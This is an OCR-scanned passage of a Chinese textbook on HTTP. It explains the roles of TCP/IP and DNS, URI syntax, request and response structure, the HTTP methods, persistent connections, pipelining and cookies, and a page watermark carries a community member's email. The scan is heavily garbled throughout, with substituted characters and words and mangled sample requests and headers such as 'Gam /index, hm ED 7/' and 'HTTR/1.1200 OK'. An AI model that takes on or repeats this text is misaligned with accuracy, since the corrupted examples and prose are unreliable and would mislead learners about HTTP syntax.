我 们 再 通过 这 张 图 来 了 解 下 IP 协议 、TCP 协议 和 DNS 服务 在 使 用 
HTTP 协议 的 通信 过 程 中 各 自发 挥 了 哪些 作用 。 





图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 





客户 站 


IP 地 址 
20X.189.105.112 
rs 
es 

hackr.jp 


服务 颖 





告诉 我 hackr.jp 的 IP 地 址 吧 
; hackr.jp 对 应 的 IP 地 址 是 
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20X.189:;105.112 





HTTP 协 议 的 职责 

生成 针对 目标 Web 服 务 器 的 HTTP 请 求 报 文 
请 给 我 http://hackr.jp/xss 
页 面 的 资源 


TCP 协 议 的 职责 
为 了 方便 通信 ,将 HTTP 请 求 报 文 分 割 成 报 文 自 
| | | | 滋 这 分 为 多 个 
报 文 自 
把 每 个 报 文 段 可 靠 地 传 给 对 方 


IP 协 议 的 职责 


搜索 对 方 的 地 址 , 一 边 中 转 一 边 传送 


TCP 协 议 的 职责 
从 对 方 那里 接收 到 的 报 文 自 


重组 到 达 的 报 文 段 
按 序 号 以 原来 的 顺序 
重组 请 求 报 文 


HTTP 协 议 的 职责 
对 Web 服 务 器 请 求 的 内 容 的 处 理 


原来 是 想 要 这 台 计 算 机 上 的 /xss/ 资 源 啊 








请 求 的 处 理 结果 也 同样 利用 TCP/IP 
通信 协议 向 用 户 进行 回 传 
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1.7 URI 和 URL 

与 URI (统一 资源 标识 符 ) 相 比 ， 我 们 更 熟悉 URL ( Uniform 
Resource Locator， 统 一 资源 定位 符 ) URL 正 是 使 用 Web 浏览 胡 等 访问 
Web 页 面 时 需要 输入 的 网 页 地 址 。 比 如 ， 下 图 的 http:/hackrjp/ 就 是 URL。 








ks | 总 http://hackrjp 





hackr 


1.7.1 统一 资源 标识 符 
016 URI 是 Uniform Resource Identifier 的 缩写 。RFC2396 分 别 对 这 
3 个 单词 进行 了 如 下 定义 。 


Uniform 

规定 统一 的 格式 可 方便 处 理 多 种 不 同类 型 的 资源 ， 而 不 用 根据 上 下 
文 环境 来 识别 资源 指定 的 访问 方式 。 另 外 ， 加 入 新 增 的 协议 方案 
(如 http: 或 ftp: ) 也 更 容易 。 








Resource 

资源 的 定义 是 “可 标识 的 任何 东西 "。 除 了 文档 文件 、 图 像 或 服务 
(例如 当天 的 天 气 预报 ) 等 能 够 区 别 于 其 他 类 型 的 ， 全 都 可 作为 资 
源 。 另 外 ， 资 源 不 仅 可 以 是 单一 的 ， 也 可 以 是 多 数 的 集合 体 。 











Identifier 
表示 可 标识 的 对 象 。 也 称 为 标识 符 。 





综 上 所 述 ，URI 就 是 由 菜 个 协议 方案 表示 的 资源 的 定位 标识 符 。 协 
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以 方案 是 指 访问 资源 所 使 用 的 协议 类 型 名 称 。 

采用 HTTP 协 议 时 ， 协 议 方案 就 是 htp。 除 此 之 外 ， 还 有 地、 
mailto、telnet、file 等 。 标 准 的 URI 协议 方案 有 30 种 左右 ， 由 隶属 于 
蒜 互 联网 资源 管理 的 非 营 利 社 团 ICANN ( Internet Corporation for Assiened 
Names and Numbers， 互 联网 名 称 与 数字 地 址 分 配 机 构 ) 的 IANA 
( Internet Assigned Numbers Authority， 互 联网 号 人 码 分 配 局 ) 管理 颁布 。 


elIANA - Uniform Resource Identifier (URI) SCHEMES ( 统一 资 
源 标识 符 方案 ) 


http:/www.1iana.org/assignments/uri-schemes 











URI 用 字符 串 标 识 某 一 互联 网 资源 ， 而 URL 表示 资源 的 地 点 ( 互 
联网 上 所 处 的 位 置 )。 可见 URL 是 URI 的 子 集 。 

“RFC3986: 统一 资源 标识 符 ( URI ) 通用 语法 ”中 列举 了 几 种 URI 
例子 ， 如 下 所 示 。 





ECE/ ECD. La.C0. ZSI/ EEC/EEGCLB08 . EE 

Mlelds /vy ELE ,Oe RO/EEC2396 ,EE 

ldap:// [2001:db8::7]/c=GB?objectClass?one 
mailto:John.Doe@example.com 

news :comp.infosystems .www.Sservers.unix 
tel:+1-816-555-1212 

Ee /L920 > G80 
urn:oasis:names:specification:docbook:dtd:xml:4.1.2 


本 书 接 下 来 的 章节 中 会 频繁 出 现 URI 这 个 术语 ， 在 充分 理解 的 基 
础 上 ， 也 可 用 URL 替换 URI。 





1.7.2 ”URI 格式 
表示 指定 的 URI， 要 使 用 涵盖 全 部 必要 信息 的 绝对 URI、 绝 对 URL 
以 及 相对 URL。 相 对 URL， 是 指 从 浏览 兹 中 基本 URI 处 指定 的 URL， 
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ee 


形 如 /image/logo.gif。 
让 我 们 先 来 了 解 一 下 绝对 URI 的 格式 。 


http://user:pass@www.example.jp:80/dir/index.htm?uid=1#ch1 





协议 ”登录 信息 。 ”服务 器 地 址 带 层次 的 文件 路 径 | 片段 标识 符 
方案 名 ( 认证 ) 服务 器 端口 号 查询 字符 串 





使 用 http: 或 https: 等 协议 方案 名 获取 访问 资源 时 要 指定 协议 类 型 。 
不 区 分 字母 大 小 写 ， 最 后 附 一 个 冒号 〈: )。 
也 可 使 用 data: 或 javascript: 这 类 指定 数据 或 脚本 程序 的 方案 名 。 














登录 信息 ( 认证 ) 
指定 用 户 名 和 密码 作为 从 服务 带 病 获取 资源 时 必要 的 登录 信息 ( 号 
份 认 证 )。 此 项 是 可 选项 。 








服务 器 地 址 

使 用 绝对 URI 必须 指定 待 访问 的 服务 器 地 址 。 地 址 可 以 是 类 似 
hackrjp 这 种 DNS 可 解析 的 名 称 ， 或 是 192.168.1.1 这 类 IPv4 地 址 
名 ， 还 可 以 是 [0:0:0:0:0:0:0:1] 这 样 用 方 括号 括 起 来 的 了 Pv6 地 址 名 。 


服务 器 端口 号 
指定 服务 器 连接 的 网 络 端口 号 。 此 项 也 是 可 选项 ， 若 用 户 省 略 则 自 
动 使 用 默认 端口 号 。 


市 层次 的 文件 路 径 

指定 服务 保 上 的 文件 路 径 来 定位 特 指 的 资源 。 这 与 UNIX 系统 的 文 
件 日 录 结 构 相 似 。 

查询 字符 串 

针对 已 指定 的 文件 路 径 内 的 资源 ， 可 以 使 用 查询 字符 串 传 人 任意 参 
数 。 此 项 可 选 。 
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卢 段 标识 符 

使 用 片段 标识 符 通 常 可 标记 出 已 获取 资源 中 的 子 资 源 (文档 内 的 
某 个 位 置 )。 但 在 RFC 中 并 没有 明确 规定 其 使 用 方法 。 该 项 也 为 
可 选项 。 


并 不 是 所 有 的 应 用 程序 都 符合 RFC 

有 
( Request for Comments， 征 求 修正 意见 书 )。 

通 单 ， 应 用 程序 会 遵照 由 RFC 确定 的 标准 实现 。 可 以 说 ，RFC 是 互 
联网 的 设计 文档 ， 要 是 不 按照 RFC 标准 执行 ， 就 有 可 能 导致 无 法 通信 的 
状况 。 比 如 ， 有 一 台 Web 服务 器 内 的 应 用 服务 没有 遵照 RFC 的 标准 实现 ， 
那 Web 浏览 器 惑 很 可 能 无 法 访问 这 全 服务 问 了 。 

由 于 不 遵照 RFC 标准 实现 就 无 法 进行 HTTP 协议 通信 ， 所 以 基本 上 019 
客户 端 和 服务 器 端 都 会 以 RFC 为 标准 来 实现 HTTP 协议 。 但 也 存在 某 些 
应 用 程序 因 客 户 端 或 服务 器 端的 不 同 ， 而 未 遵照 RFC 标准 ， 反 而 将 自 成 
一 套 的 “标准 ”扩展 的 情况 。 

TR RECHT EK NT EE 
其 他 所 有 的 客户 端 和 服务 器 端 。 但 设想 一 下 ， 如 果 这 款 应 用 程序 的 使 用 者 
非常 多 ， 那 会 发 生 什么 情况 ? 不 难 想象 ， 其 他 的 客户 端 或 服务 器 端 必然 都 
不 得 不 去 配合 它 。 

实际 在 互联 网 上 ， 已 经 实现 了 HTTP 协议 的 一 些 服 务 器 端 和 客户 端 
里 就 存在 上 述 情 况 。 说 不 定 它们 会 与 本 书 介绍 的 HTTP 协议 的 实现 情况 不 
二 人 

本 书 接 下 来 要 介绍 的 HTTP 协议 内 容 ， 除 去 部 分 例外 ， 基 本 上 都 以 
RFC 的 标准 为 准 。 
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第 2 章 
简单 的 HTTP 协议 


本 章 将 针对 HTTP 协 议 结构 进行 讲解 ， 主 要 使 用 HTTP/1.1 版 本 。 学 
完 这 章 ， 想 必 大 家 就 能 理解 HTTP 协议 的 基础 了 。 
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2.1 HTTP 协议 用 于 客户 端 和 服务 器 端 之 间 的 通信 


HTTP 协议 和 TCP/IP 协议 族 内 的 其 他 众多 的 协议 相同 ， 用 于 客户 
端 和 服务 器 之 间 的 通信 。 

请 求 访问 文本 或 图 像 等 资源 的 一 端 称 为 客户 端 ， 而 提供 资源 响应 的 
一 端 称 为 服务 器 端 。 














多: 应 用 HTTP 协议 时 ， 必 定 是 一 端 担任 客户 端 角 色 ， 另 一 端 担任 服务 器 端 角 色 


在 两 台 计 算 机 之 间 使 用 HTTP 协议 通信 时 ， 在 一 条 通信 线路 上 必定 
有 一 站 是 客户 痪 ， 万 一 叶 则 是 服务 闪闪 。 

有 时 候 ， 按 实际 情况 ， 两 台 计 算 机 作为 客户 闫 和 服务 硕 问 的 角色 有 
可 能 会 互 换 。 但 台 仅 从 一 条 通信 路 线 来 说 ， 服 务 融 病 和 客户 端的 角色 是 
确定 的 ， 而 用 HTTP 协议 能 够 明确 区 分 哪 端 是 客户 端 ， 哪 端 是 服务 带 病 。 











2.2 ”通过 请 求 和 响应 的 交换 达成 通信 





: 请 求 必 定 由 客 忆 端 发 出 ， 而 服务 器 端 回复 响应 
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HTTP 协议 规定 ， 请 求 从 客户 病 发 出 ， 最 后 服务 各 端 啊 应 该 请 求 并 
返回 。 换 句 话 说， 肯定 是 先 从 客户 端 开 始 建立 通信 的 ， 服 务 需 端 在 没有 
接收 到 请 求 之 前 不 会 发 送 啊 应 。 

下 面 ， 我 们 来 看 一 个 具体 的 示例 。 

中 发 送 请 求 


GET / HTTP/1.1 
HOSE NdeI 


全 一 一 


客户 端 服务 器 发 送 响应 
E200 ok 
Base mu ON 0 0 SO SME 
Content Penmngen 362 
Content-Type: text/html 
<IMeEm 














下 面 则 是 从 客户 端 发 送 给 某 个 HTTP 服务 需 疝 的 请 求 报 文 中 的 
内 容 。 


Gam /index, hm ED 7/ 
Host: hackr.jp 


起 始 行 开 头 的 GET 表示 请 求 访 问 服务 郑 的 类 型 ， 称 为 方法 
( method )。 随 后 的 字符 串 /index.htm 指明 了 请 求 访问 的 资源 对 象 ， 也 叫 
做 请 求 URI ( requestrURI )。 最 后 的 HITP/1.1， 即 HTTP 的 版 本 号 ， 用 
来 提示 客户 端 使 用 的 HTTP 协议 功能 。 

综合 来 看 ， 这 段 请 求 内 容 的 意思 是 : 请 求 访问 某 台 HTTP 服务 右上 
的 /index.htm 页 面 资 源 。 

请 求 报 文 是 由 请 求 方法 、 请 求 URI、 协 议 版 本 、 可 选 的 请 求 首部 字 
段 和 内 容 实 体 构成 的 。 
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国 加 国 


URI 协议 版 本 


方法 
| | | 请 求 首部 字段 
了 月 部 字段 


POST deyanVAen a 碧 平 下 BA 


Hose :mae 

Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 16 


ame vu enerage Sy 


内 容 实体 
: 请 求 报 文 的 构成 


请 求 首 部 字段 及 内 容 实体 稍 后 会 作 详细 说 明 。 接 下 来 ， 我 们 继续 讲 
解 。 接 收 到 请 求 的 服务 般 ， 会 将 请 求 内 容 的 处 理 结 来 以 啊 应 的 形式 返回 。 


Ea/ ,1 S00 OK 

Darse Ee om 0 50 SCME 
Comtente Teneen ee 

Content-Type: text/html 


在 起 始 行 开头 的 HTTP/1.1 表示 服务 天 对 应 的 HTTP 版 本 。 

紧 挨 着 的 200 OK 表示 请 求 的 处 理 结 果 的 状态 码 ( status code ) 和 原 
因 短 语 ( reason-phrase )。 下 一 行 显示 了 创建 啊 应 的 日 期 时 间 ， 是 首部 字 
段 (header field ) 内 的 一 个 属性 。 

接着 以 一 空 行 分 隔 ， 之 后 的 内 容 称 为 资源 实体 的 主体 (entity 
body )。 

啊 应 报 文 基本 上 由 协议 版 本 、 状 态 公 (表示 请 求 成 功 或 失败 的 数字 
代码 )、 用 以 解释 状态 码 的 原因 短语 、 可 选 的 啊 应 首部 字段 以 及 实体 主 
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体 构 成 。 稍 后 我 们 会 对 这 些 内 容 进 行 详细 说 明 。 


状态 码 的 原因 短语 
协议 版 本 ”状态 码 
— 响应 首部 字段 


HTTEWIST (200 lok 


Dalee .Euepe o Jul020050 :sseME 
@omeeme nme o> 
Content-Type: text/html 


< em 


-| 
主体 


: 响应 报 文 的 构成 


2.3 HTTP 是 不 保存 状态 的 协议 


HTTP 是 一 种 不 保存 状态 ， 即 无 状态 ( stateless ) 协 以 。HTTP 协议 
自身 不 对 请 求 和 响应 之 间 的 通信 状态 进行 保存 。 也 就 是 说 在 HITP 这 个 











级 别 ， 协 议 对 于 发 送 过 的 请 求 或 响应 都 不 做 持久 化 处 理 。 










我 想 想 ， 之 前 发 送 了 
什么 给 你 来 着 ? 


你 之 前 发 送 了 3 什么 
给 我 来 着 ? 










客户 并 痛 
: HTTP 协议 自身 不 具备 保存 之 前 发 送 过 的 请 求 或 响应 的 功能 


使 用 HTTP 协议， 每 当 有 新 的 请 求 发 送 时 ， 就 会 有 对 应 的 新 啊 应 产 
生 。 协 议 本 身 并 不 保留 之 前 一 切 的 请 求 或 啊 应 报 文 的 信息 。 这 是 为 了 更 
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快 地 处 理 大 量 事 务 ， 确 保 协议 的 可 伸缩 性 ， 而 特意 把 HITP 协议 设计 成 
如 此 简单 的 。 

可 是 ， 随 看 Web 的 不 断 发 展 ， 因 无 状态 而 导致 业务 处 理 变 得 棘手 
的 情况 增多 了 。 比 如 ， 用 户 登 录 到 一 家 购物 网 站 ， 即 使 他 跳 转 到 该 站 的 
其 他 页 面 后 ， 也 需要 能 继续 保持 登录 状态 。 针 对 这 个 实例 ， 网 站 为 了 能 
够 掌握 是 谁 送 出 的 请 求 ， 需 要 保存 用 户 的 状态 。 

HTTP/1.1 虽然 是 无 状态 协议 ， 但 为 了 实现 期 望 的 保持 状态 功能 ， 
于 是 引入 了 Cookie 技术 。 有 了 Cookie 再 用 HTTP 协议 通信 ， 就 可 以 管 
理 状 态 了 。 有 关 Cookie 的 详细 内 容 稍 后 讲解 。 





2.4 ”请 求 URI 定位 资源 


HTTP 协议 使 用 URI 定位 互联 网 上 的 资源 。 正 是 因为 URI 的 特定 功 
026 ”能 ， 在 互联 网 上 任意 位 置 的 资源 都 能 访问 到 。 





URI A 
http:/Wwww.usagidesign.jp/photo/usagthtm 
Saf 


bm ale S 


NE 
hackr.jp 
客户 站 T 
URI < 








http://www.example.com/auth/index.htm 


www.example.com 


图 : HTTP 协议 使 用 URI 让 客户 端 定 位 到 资源 
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当 客 户 端 请求 访 问 资 源 而 发 送 请 求 时 ，URI 需要 将 作为 请 求 报 文中 
的 请 求 URI 包含 在 内 。 指 定 请 求 URI 的 方式 有 很 多 。 


" URI 为 完整 的 请 求 URI 


GET mee ya mex.htm HITTP/1.1 
请 来 URI 


“ 在 首部 字段 Host 中 写 明 网 络 域名 或 IP 地 址 


Ea /inoder. mem Erm/i.1 
Host: hackr.jp 


图 : 以 http://hackr.jp/index.htm 作为 请 求 的 例子 
除 此 之 外 ， 如 果 不 是 访问 特定 资源 而 是 对 服务 器 本 号 发 起 请 求 ， 可 


以 用 一 个 * 来 代替 请 求 URI。 下 面 这 个 例子 是 查询 HTTP 服务 磊 端 支持 
的 HTTP 方法 种 类 。 





OPTIONS * HTTP/1.1 


2.5 ”告知 服务 器 意图 的 HTTP 方法 
下 面 ， 我 们 介绍 HTTP/1.1 中 可 使 用 的 方法 。 


GET : 获取 资源 

GET 方法 用 来 请 求 访问 已 被 URI 识别 的 资源 。 指 定 的 资源 经 服务 
僵 闹 解析 后 返回 啊 应 内 容 。 也 就 是 说 ， 如 末 请 求 的 资源 是 文本 ， 那 就 保 
持原 样 返 回 ; 如 果 是 像 CGI ( Common Gateway Interface， 通 用 网 关 接 
口 ) 那样 的 程序 ， 则 返回 经 过 执行 后 的 输出 结 
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使 用 GET 方法 的 请 求 . 响应 的 例子 


GET /index.html HTTP/1.1 
Host: www.hackr.jp 





返回 index.html 的 页 面 资 源 


GET /index.html HTTP/1.1 
Host: www.hackr.jp 
If-Modified-Since: Thu 12 Jul 2012 07:30:00 GMT 


028 仅 返 回 2012 年 7 月 12 日 7 点 30 分 以 后 更 新 过 的 index.html 页 面 资源 。 
如 果 未 有 内 容 更 新 ， 则 以 状态 码 304 Not Modified 作 为 响应 返回 





POST: 传输 实体 主体 

POST 方法 用 来 传输 实体 的 主体 。 

虽然 用 GET 方法 也 可 以 传输 实体 的 主体 ， 但 一 般 不 用 GET 方法 进 
行 传输 ， 而 是 用 POST 方法。 虽说 POST 的 功能 与 GET 很 相似 ， 但 
POST 的 主要 目的 并 不 是 获取 啊 应 的 主体 内 容 。 
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使 用 POST 方法 的 请 求 * 响应 的 例子 


POST /submitiegt HTTP/N:1 
Host: www.hackr.jp 


Content-Length: 1560 ( 1560 字 节 的 数据 ) 
返回 submit.cgi 接 收 数据 的 处 理 结果 





PUT : 传输 文件 

PUT 方法 用 来 传输 文件 。 就 像 FTP 协议 的 文件 上 传 一 样 ， 要 求 在 
请 求 报 文 的 主体 中 包含 文件 内 容 ， 然 后 保存 到 请 求 URI 指定 的 位 置 。 

但 是 ， 鉴 于 HTTP/1.1 的 PUT 方法 自身 不 带 验 证 机 制 ， 任 何人 都 可 
以 上 传 文件 ,存在 安全 性 问题 ， 因 此 一 般 的 Web 网 站 不 使 用 该 方法 。 寿 
配合 Web 应 用 程序 的 验证 机 制 ， 或 染 构 设 计 采 用 REST( REpresentational 
State Transfer， 表 征 状态 转移 ) 标准 的 同类 Web 网 站 ， 就 可 能 会 开放 使 
用 PUT 方 法 。 
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我 村 把 这 份 
文件 传 给 你 /! 





使 用 PUT 方法 的 请 求 * 响应 的 例子 


PUT /example.html HTTP/1.1 
Host: www.hackr.jp 


\ 主 < 
请 求 Content-Type: text/html 


Content-Length: 1560 ( 1560 字 节 的 数据 ) 
了 响应? 响应 返回 状态 码 204 No Content ( 比如 : 该 html 已 存在 于 服务 器 上 ) 








四 响应 的 意思 其 实 是 请 求 执行 成 功 了 ， 但 无 数据 返回 。 一 一 译 者 注 
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HEAD: 获得 报 文 首部 
HEAD 方法 和 GET 方法 一 样 ， 只 是 不 返回 报 文 主体 部 分 。 用 于 确认 
URI 的 有 效 性 及 资源 更 新 的 日 期 时 间 等 。 










把 那个 的 相 关 
信息 告诉 我 ! 


客户 端 
图 : 和 GET 一样， 但 不 返回 报 文 主体 


使 用 HEAD 方法 的 请 求 响应 的 例子 


HEAD /index.html HTTP/1.1 
Host: www.hackr.jp 





返回 index.html 有 关 的 响应 首部 





DELETE: 删除 文件 

DELETE 方法 用 来 删除 文件 ， 是 与 PUT 相反 的 方法 。DELETE 方 
法 按 请 求 URI 删除 指定 的 资源 。 

但 是 ，HTTP/1.1 的 DELETE 方法 本 身 和 PUT 方法 一 样 不 带 验 证 机 
制 ， 所 以 一 般 的 Web 网 站 也 不 使 用 DELETE 方法 。 当 配合 Web 应 用 程 
序 的 验证 机 制 ， 或 遵守 REST 标准 时 还 是 有 可 能 会 开放 使 用 的 。 


快 把 那 份 文件 
册 上 | 掉 吧 ~ 
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使 用 DELETE 方法 的 请 求 : 响应 的 例子 





OPTIONS : 询问 支持 的 方法 
OPTIONS 方法 用 来 查询 针对 请 求 URI 指定 的 资源 支持 的 方法 。 
你 支持 哪些 方法 ? 


”支持 GET 和 
HEAD 方法 


客户 站 服务 器 
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使 用 OPTIONS 方法 的 请 求 . 响应 的 例子 


请 求 OPTIONS™Y HLTIBL 
Host: www.hackr.jp 


HTTP/1.1 200 OK 
Allow: GET, POST, HEAD, OPTIONS 
( 返回 服务 器 支持 的 方法 ) 





TRACE: 追踪 路 径 

TRACE 方法 是 让 Web 服务 硕 端 将 之 前 的 请 求 通 信 环 回 给 客户 端的 
Ds 

发 送 请 求 时 ， 在 Max-Forwards 首部 字段 中 填 和 人 数值， 每 经 过 一 个 
服务 硕 端 承 将 该 数字 减 1， 当 数值 刚好 减 到 0 时 ， 就 停止 继续 传输 ， 最 
后 接收 到 请 求 的 服务 需 端 则 返回 状态 码 200 OK 的 啊 应 。 

客户 端 通过 TRACE 方法 可 以 查询 发 送出 去 的 请 求 是 怎样 被 加 工 修 
改 / 算 改 的 。 这 是 因为 ， 请 求 想 要 连接 到 源 上 日 标 服务 右 可 能 会 通过 代理 
中 转 ，TRACE 方法 就 是 用 来 确认 连接 过 程 中 发 生 的 一 系列 操作 。 
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但 是 ，TRACE 方法 本 来 就 不 怎么 常用 ， 再 加 上 它 容 易 引 发 XST 
( Cross-Site Tracing， 跨 站 追踪 ) 攻击 ， 通 常 就 更 不 会 用 到 了 了。 















我 收 到 曲 是 
这 样 的 请 求 


之 后 挣 会 发 生 些 
什么 呢 ? 







从 代理 服务 器 路 由 中 转 时 请 求 
可 能 被 自 改 





客户 站 代理 服务 器 代理 服务 器 


Max-Forwards: 2 Max-Forwards: 1 Max-Forwards: 0 


使 用 TRACE 方法 的 请 求 * 响应 的 例子 


TRACE / HTTP/1.1 
Host: hackr.jp 
Max-Forwards: 2 





HTTR/1.1200 OK 
Content-Type: messagey/http 


Content-Length: 1024 


TRACE / HTTP/1.1 
Host: hackr.jp 
Max-Forwards: 2 ( 返回 响应 包含 请 求 内 容 ) 





CONNECT: 要 求 用 隧道 协议 连接 代理 

CONNECT 方法 要 求 在 与 代理 服务 右 通 信 时 建立 隧道 ， 实 现 用 隧道 
协议 进行 TCP 通信 。 主 要 使 用 SSL ( Secure Sockets Layer， 安 全 套 接 
层 ) 和 TLS (Transport Layer Security， 传 输 层 安全 ) 协议 把 通信 内 容 加 
密 后 经 网 络 隧道 传输 。 

CONNECT 方法 的 格式 如 下 所 示 。 








CONNECTE 代 理 服 务 线 名 国清 国 号 amEB 版 未 
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CONNECT proxy.hackr.jp:8080 HTTP/1.1 
Host: proxy.hackr.jp 


HTTP/1.1 200 OK ( 之 后 进入 网 络 隧道 ) 





2.6 ”使 用 方法 下 达 命 令 


癌 请 求 URI 指定 的 资源 发 送 请 求 报 文 时 ， 采 用 称 为 方法 的 命令 。 
方法 的 作用 在 于 ， 可 以 指定 请 求 的 资源 按期 望 产 生 革 种 行为 。 方 法 
中 有 GET、POST 和 HEAD 等 。 
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GET 方法 
请 给 我 那个 资源 ! 





PUT 方法 
我 发 文件 过 来 啦 ~ 





HEAD 方法 
告诉 我 通信 状态 





图 : 使 用 方法 给 服务 器 下 达 命 令 


下 表 列 出 了 HTTP/1.0 和 HTTP/1.1 支持 的 方法 。 男 外 ， 方法 名 区 分 
大 小 写 ， 注 意 要 用 大 写字 母 。 
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表 2-1: HTTP/1.0 和 HTTP/1.1 支持 的 方法 





训 友 持 的 HTTP 协议 版 本 


获取 资源 
POST 传输 实体 主体 


1.0、1.1 
1.0% sl 





传输 文件 


LD -ls 


PUT A 
HEAD 获得 报 文 首部 VO 


1,0% .1 
Ly 


本 内 人 
询问 支持 的 方法 





TRACE 追踪 路 径 
CONNECT 要 求 用 隧道 协议 连接 代理 


建立 和 资源 之 间 的 联系 
接头 








在 这 里 列举 的 众多 方法 中 ，LINK 和 UNLINK 已 被 HTTP/1.1 废弃 ， 


不 再 文 持 。 


2.7 ”持久 连接 节省 通信 和 量 





HTTP 协议 的 初始 版 本 中 ， 每 进行 一 次 HTTP 通信 和 就 要 断 开 一 次 


TCP 4 


建立 TCP 连接 





浙 开 TCP 连接 
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以 当年 的 通信 和 情况 来 说 ， 因 为 都 是 些 容 量 很 小 的 文本 传输 ， 所 以 即 
使 这 样 也 没有 多 大 问题 。 可 随 着 HTTP 的 普及 ， 文 档 中 包含 大 量 图 片 的 
情况 多 了 起 来 。 

比如 ， 使 用 浏览 咒 浏 览 一 个 包含 多 张 图 片 的 HIML 页 面 时 ， 在 发 
送 请 求 访问 HTML 页 面 资 源 的 同时 ， 也 会 请 求 该 HTML 页 面 里 包含 的 
其 他 资源 。 因 此 ， 每 次 的 请 求 都 会 造成 无 请 的 TCP 连接 建立 和 上 断 开 ， 
增加 通信 和 量 的 开销 。 














发 送 请 求 一 份 包含 多 张 图 
片 的 HTML 文 档 对 应 的 


Web 页 面 , 会 产生 大 量 的 
通信 开销 。 
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获取 图 片 





建立 TCP 连接 
HTTP 请 求 /响应 


浙 开 TCP 连接 
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2.7.1 持久 连接 

为 解决 上 述 TCP 连接 的 问题 ，HTTP/1.1 和 一 部 分 的 HTTP/1.0 想 出 
了 持久 连接 (HTTP Persistent Connections， 也 称 为 HTTP keep-alive 或 
HTTP connection reuse ) 的 方法 。 持 和 久 连 接 的 特点 是 ， 只 要 任意 一 端 没 
有 明确 提出 断 开 连接 ， 则 保持 TCP 连接 状态 。 








建立 TCP 连 接 






一 
二 SYN/ACK 

Web 页 面 的 打开 RE 

速度 变 快 3 = 
= HTTP0 内 应 

HTTP 请 求 一 卢 
= HTTP0 册 应 









只 要 建立 连接 就 能 
一 况 性 发 送 请 求 巾 






新 开 TCP 连 接 | 


图 : 持久 连接 旨 在 建立 1 次 TCP 连接 后 进行 多 次 请 求 和 响应 的 交互 





持久 连接 的 好 处 在 于 减少 了 TCP 连接 的 重复 建立 和 上 断 开 所 造成 的 
额外 开销 ,减轻 了 服务 器 端的 负载 。 男 外 ,减少 开销 的 那 部 分 时 间 ， 使 
HTTP 请 求 和 响应 能 够 更 早 地 结束 ， 这 样 Web 页 面 的 显示 速度 也 就 相应 
提高 了 。 

在 HTTP/1.1 中 ， 所 有 的 连接 默认 都 是 持久 连接 ， 但 在 HTTP/1.0 内 
并 未 标准 化 。 虽 然 有 一 部 分 服务 需 通 过 非 标准 的 手段 实现 了 持久 连接 ， 
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但 服务 表 冰 不 一 定 能 够 文 持 持 久 连 接 。 蛇 无 疑问 ， 除 了 服务 从 疾 ， 客 户 
咒 也 需要 文 持 持久 连接 。 


2.7.2 ”管线 化 

持久 连接 使 得 多 数 请 求 以 管线 化 (pipelining ) 方式 发 送 成 为 可 能 。 
从 前 发 送 请 求 后 需 等 待 并 收 到 响应 ， 才 能 发 送 下 一 个 请 求 。 管 线 化 技术 
出 现 后 ， 不 用 等 待 响应 亦 可 直接 发 送 下 一 个 请 求 。 

这 样 就 能 够 做 到 同时 并 行 发 送 多 个 请 求 ， 而 不 需要 一 个 接 一 个 地 等 
待 响应 了 。 












不 用 竺 待 就 能 直接 
二 个 请 求 ! 


sD 


HTTP 请 求 中 一，’” 
HTTP 请 求 @ 一 一 


= HTTP0 册 应 (1) 
= HTTP 响 应 (2) 


: 不 等 待 响 应 ， 直 接 发 送 下 一 个 请 求 


比如 ， 当 请 求 一 个 包含 10 张 图 片 的 HTML Web 页 面 ， 与 挨个 连接 
相 比 ， 用 持久 连接 可 以 让 请 求 更 快 结束 。 而 管线 化 技术 则 比 持久 连接 还 
要 快 。 请 求 数 越 多 ， 时 间 差 就 越 明显 。 


2.8 ”使 用 Cookie 的 状态 管理 


HTTP 是 无 状态 协议 ， 它 不 对 之 前 发 生 过 的 请 求 和 啊 应 的 状态 进行 
管理 。 也 就 是 说 ， 无 法 根据 之 前 的 状态 进行 本 次 的 请 求 处 理 。 

假设 要 求 登录 认证 的 Web 页 面 本 里 无 法 进行 状态 的 管理 (不 记录 
已 登录 的 状态 )， 那 么 每 次 跳 转 新 页 面 不 是 要 再 次 登录 ， 就 是 要 在 每 次 
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请 求 报 文 中 附加 参数 来 管理 登录 状态 。 

不 可 和 否认， 无 状态 协议 当然 也 有 它 的 优点 。 由 于 不 必 保 存 状 态 ， 目 
然 可 减少 服务 天 的 CPU 及 内 存 资 源 的 消耗 。 从 为 一 侧面 来 说 ， 也 正 是 
为 HTTP 协议 本 号 是 非 肖 简单 的 ， 所 以 才 会 被 应 用 在 各 种 场景 里 。 


让 我 一 一 记 住 你 
们 ， 我 曲 身体 可 
咏 不 消 o9 





图 : 如 果 让 服务 器 管理 全 部 客户 端 状态 则 会 成 为 负担 


保留 无 状态 协议 这 个 特征 的 同时 又 要 解决 类 似 的 矛盾 问题 ， 于 是 引 
入 了 Cookie 技术 。Cookie 技术 通过 在 请 求 和 啊 应 报 文中 写 和 人 Cookie 信 
县 来 控制 客户 端的 状态 。 

Cookie 会 根据 从 服务 希 端 发 送 的 啊 应 报 文 内 的 一 个 叫做 Set-Cookie 
的 首部 字段 信息 ， 通 知客 户 端 保存 Cookie。 当 下 次 客户 端 再 往 该 服务 器 
发 送 请 求 时 ， 客 户 问 会 目 动 在 请 求 报 文中 加 入 Cookie 值 后 发 送出 去 。 

服务 器 端 发 现 客户 端 发 送 过 来 的 Cookie 后 ， 会 去 检查 究竟 是 从 哪 
一 个 客户 端 发 来 的 连接 请 求 ， 然 后 对 比 服务 器 上 的 记录 ， 最 后 得 到 之 前 
的 状态 信息 。 
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e 没有 Cookie 信息 状态 下 的 请 求 


生成 Cookie 
记 住 是 向 谁 发 送 的 


中 保存 请 求 





在 响应 中 添加 Cookie 后 返回 








客户 端 
保存 Cookie 十 





Cookie 


Cookie 


多 第 2 次 以 后 ( 存 有 Cookie 信 息 状 态 ) 的 请 求 


本 (检查 Cookie 
(3) 请 求 ce 


人 全国 


Cookie 


4——— NV 


039 













cr， 昆 站 | 才 由 
那 家 化 





上 图 展示 了 发 生 Cookie 交互 的 情景 ，HTTP 请 求 报 文 和 啊 应 报 文 的 
内 容 如 下 。 


中 请 求 报 文 (没有 Cookie 信息 的 状态 ) 


GET /reader/ HTTP/1.1 
Hos nae 


* 首部 字段 内 没有 Cookie 的 相关 信息 
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@O) 响 应 报 文 ( 服务 器 端 生成 Cookie 信息 ) 


Ea/ OO OR 

四 ae 

Seneree 

< Set-Cookie: sid=1342077140226724; path=/; expires=Wed, 一 
NO Oe 107 :00eMVM > 

